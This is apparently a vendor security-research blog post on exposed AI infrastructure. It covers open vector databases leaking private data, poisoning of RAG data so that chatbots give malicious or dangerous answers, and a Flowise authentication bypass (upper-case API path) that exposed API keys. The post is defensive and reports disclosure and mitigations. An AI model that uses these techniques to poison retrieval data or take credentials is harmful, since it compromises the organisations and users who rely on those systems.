Get our research team's analysis of the security of GenAI development services.
These days, AI tools and platforms can help your organization in countless ways. You can use large language models (LLMs) to build a chatbot for your clients or employees, or you can choose from the many MLOps platforms to create your own AI flows that orchestrate LLMs, documents, scraping tools, and databases to increase efficiency and speed innovation.
However, despite the many benefits, these systems also introduce risk, such as sensitive information exposure, or leakage of secrets.
Our research team investigated a few of these AI platforms for security issues and potential data leakage and found several vulnerabilities in systems and services that are publicly accessible, meaning anyone with Internet access could exploit them.
In this blog post, we discuss the risks surrounding publicly accessible AI services, specifically two popular types:
- Vector DBs
- LLM tools
We will present actual vulnerabilities that we've encountered as part of the research and outline recommended mitigations to help prevent these risks.
Publicly Exposed Vector Databases
What is a vector database?
A vector database is a system that stores data in the form of vectors and is used in many architectures involving AI models. A vector database indexes and stores embeddings – a numerical representation of your data as a list of multi-dimensional vectors – along with the metadata of this embedding in a human-readable text form. Popular vector DB platforms include Milvus, Qdrant, Chroma, and Weaviate.
These databases are primarily used in retrieval-augmented generation (RAG) architectures where the LLM model relies on external retrieval of the necessary data to generate its response. For example, a vector database can contain embeddings of medical data, where the metadata includes the appropriate treatment for it.
Security risks of vector databases
Today, there are many different vector database products. Some are open-source, and extremely easy to set up. These databases can store private and confidential data, like PII, medical information, or private email conversations. Consequently, there are potential security risks, including:
Data leakage
As a service that handles sensitive data, security should be a top concern. However, we found that, in many cases, there’s a lack of basic guardrails. For example, we found publicly accessible instances allowing anonymous access, where there is no permission enforcement as part of the setup and anyone with network access to the server can read all the data, including:
- The metadata – which contains human-readable text that might be private
- The embeddings – which, according to recent research, are possible to invert to recover part of the input data
Data poisoning
In a data poisoning attack, an attacker gains access to the database and modifies or deletes parts of the data, changing the behavior of the AI application that relies on the data. Here are some examples of this attack:
- Client chatbot: A chatbot may use a vector database to store information about product software updates. Modifying this data could lead to responses with instructions to download and install malicious files, which may result in malware gaining access to customers’ devices and data.
- Medical consulting chatbot that uses historical patient data: Altering this data can result in wrong and even dangerous medical advice.
- RAG system for summarization of a company financial data: Deletion of data may result in a malfunction of the system.
Security vulnerabilities exploitation
When you deploy vector database software on a self-hosted server, an attacker may exploit vulnerabilities that exist on that software, and, for example, gain remote code execution or privilege escalation on that server. The risk is even more significant when using outdated software, where vulnerabilities are well known and easily exploited.
If, for example, you accidentally or intentionally misconfigured your server to be publicly accessible or with weak authentication, you may be vulnerable to those risks, with a high likelihood of attackers stealing or poisoning your data. In addition, with some prior knowledge, an attacker could edit just the vector data (not the human-readable metadata), making the attack extremely hard to identify and remediate.
Following are some examples we encountered in the wild where such attacks were possible.
Analysis of unprotected vector databases
During this research, we searched for vector database instances using tools that find publicly accessible devices and services.
With each popular vector database system, we checked for required authentication and examined whether it was possible to extract their data.
Our investigation found around 30 servers with evidence of corporate or private data. For example:
- Company private email conversations
- Customer PII and product serial numbers
- Financial records
- Candidate resumes and contact information
Some of the vector databases were susceptible to data poisoning:
- Medical chatbot with patients' information database
- Product documentation and technical data sheets
- Company Q&A data
- Real estate agency property data
In all these cases, no vulnerabilities or tools were needed to read the data. Most platforms have REST-API or Web UI to read and export the data. We could also use these interfaces to modify or delete the data.
Here's an example of a Weaviate vector database, belonging to a company from the engineering services sector, which contained private email conversations:
In another example, we found an instance of a Qdrant database, belonging to a company in the industrial equipment sector, that contained customers’ personal details and purchase information:
Another Weaviate DB from a fashion company, with documents and media summaries:
Publicly Exposed LLM Tools
No-code LLM automation tools
In addition to researching vector databases, we investigated a low-code LLM flows builder - Flowise. This kind of tool lets you build your own LLM flow, including integrations with data loaders, caches, and databases. You can create an AI agent that uses tools to execute tasks like scheduling appointments or sending REST-API requests. Flowise also implements an SDK for programmers to integrate into other applications for public use.
Security risks of LLM automation tools
Data risks
This type of tool can access all kinds of sensitive data, like private company files, LLM models, application configurations, and prompts. Hence, most of these services should be protected by authentication and authorization mechanisms, to avoid the risks of data leakage and data poisoning.
Credential leakage
In addition to leveraging the built-in capabilities within these tools, users often integrate them with external services, like OpenAI API, AWS Bedrock, and even Confluence or GitHub. The leakage of the integrations' credentials may lead to an even bigger risk, as in recent data breaches at Microsoft and Lowe's Market.
Is there a way to bypass Flowise security mechanisms?
Similar to the vector database research, we scanned for public instances of Flowise servers. Most of the servers we encountered were password-protected.
However, as often happens in new systems, there are some simple vulnerabilities in early versions of the platform that can be easily exploited. In this case, we encountered a simple authentication bypass (CVE-2024-31621). To exploit this vulnerability, you only need to use the REST-API endpoints with upper-case letters instead of lower-case ones (/API/v1 vs. /api/v1).
Exposed Flowise server, which returns HTTP 401 - Unauthorized Error on any API request:
Here is the same request, to the same server and endpoint, with a slight change to the URL, which gave us access to the API, without the need for any authentication:
With this knowledge, we checked the Flowise servers we found earlier, and out of 959 servers, 438 (45%) were vulnerable(!). Now we can interact with this server’s REST-API endpoints, and retrieve all kinds of information and data, without any permissions limitations.
In addition, in some older versions of Flowise, all the secrets (passwords, API keys) are stored as plaintext in the configuration. This combination lets us easily access all the secrets in any vulnerable server.
Key findings from our LLM tools research
We scanned the data in these servers and found a couple dozen secrets, including:
- OpenAI API keys
- Pinecone (Vector DB SaaS) API keys
- GitHub access tokens
- URLs with DB’s passwords
In addition, we found all the configurations and LLM prompts of these applications, which can help exploit prompt vulnerabilities down the road.
For additional information about exposed secret risks, refer to our white paper on this topic.
Example of a simple extraction of GitHub Tokens and OpenAI API keys from a vulnerable Flowise instance:
Another example of Pinecone API key that we found hardcoded in one of the flow configurations is shown below. This can give us access to the data stored in this account.
Disclosure
We contacted many companies that owned those publicly exposed servers, and most took care of the risk and blocked access to them.
Conclusion
How to protect yourself
AI is the most talked about topic in the tech industry today, so you want to know what platforms your developers are using, and to be sure that you are protected from the new attack paths these platforms introduce.
Restrict access to AI services
First, prevent unnecessary access to the DBs or services. Employ a strict permissions system and disallow anonymous access. If possible, do not publicly expose these services, and manage access through private networks.
Monitor and log activity
Make sure your AI platforms are monitored, and the actions are logged to avoid leakage of data, and to prevent potential data poisoning. Choose your platforms based on security features, so you can verify the integrity of your data, and make sure only authenticated and authorized users can access and alter the data.
Use updated software
All software has vulnerabilities, especially new software. Each case of AI usage has many different libraries and tools to choose from, and you want to make sure your engineers use the safe ones. You can use code scanning tools to make sure your code and dependencies are free of known CVEs and other vulnerabilities.
Mask sensitive details from your data before using it for LLM
Make sure to remove any clients' PII and other sensitive information from your data. If you need to access this information later, use techniques to tokenize this data and keep it in platforms like Data Privacy Vault, which keeps this information secure and isolated.
How Legit Security Can Help
The Legit Security application security posture management (ASPM) platform, with its AI-discovery features, can give you complete visibility into the use of LLM models in your code and ensure their reliability. The platform also includes secret scanning for your entire SDLC and additional scanners to help you secure your organization. Learn more about the Legit platform here.